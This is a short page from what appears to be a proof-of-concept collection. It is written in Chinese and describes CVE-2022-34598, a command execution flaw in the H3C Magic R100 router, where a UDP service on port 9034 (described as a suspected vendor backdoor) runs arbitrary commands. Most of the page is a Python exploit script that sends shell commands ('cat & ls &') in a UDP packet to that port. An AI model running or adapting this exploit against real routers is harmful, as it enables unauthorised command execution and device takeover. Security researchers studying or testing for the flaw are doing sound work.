POC/wpoc/H3C/H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

579 B
Raw Blame History

H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)

H3C Magic R100 存在安全漏洞该漏洞源于updserver服务打开了疑似官方后门的9034端口,允许攻击者执行任意命令。

exp

import socket

Ip="0.0.0.0"
Port=9034

msg=b"cat & ls &"
server_address=(Ip,Port)

udp_socket=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.sendto(msg,server_address)

udp_socket.close()

漏洞来源